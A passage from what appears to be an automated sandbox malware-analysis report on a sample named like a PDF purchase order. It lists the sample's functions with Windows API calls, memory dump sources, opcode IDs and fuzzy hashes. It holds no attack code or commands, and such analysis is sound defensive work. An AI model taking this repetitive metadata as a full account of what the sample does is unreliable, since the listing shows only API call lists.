                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                            • API String ID: 1153243558-438819550
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                                                                                                                                                                                                                            Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00455127
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                                                                                                                                                                                                            • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00455207
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 1663942905-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                                                                                                                                                            • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                                                                                                                                                                                                            Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1481289235-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                                                                                                                                                            • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                                                                                                                                                                                                            Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2632138820-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                            • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                                                                                                                                                                                                            Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CursorLoad
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3238433803-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                                                                                                                                                            • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                                                                                                                                                                                                            Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00460B00
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00460B9E
                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00460D40
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: %s%u
                                                                                                                                                                                                                                                                                                            • API String ID: 1899580136-679674701
                                                                                                                                                                                                                                                                                                            • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                                                                                                                                                                                            • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                                                                                                                                                                                                            Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 2485709727-934586222
                                                                                                                                                                                                                                                                                                            • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                                                                                                                                                                                                            Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3381189665-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                                                                                                                                                                                                            Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00434585
                                                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
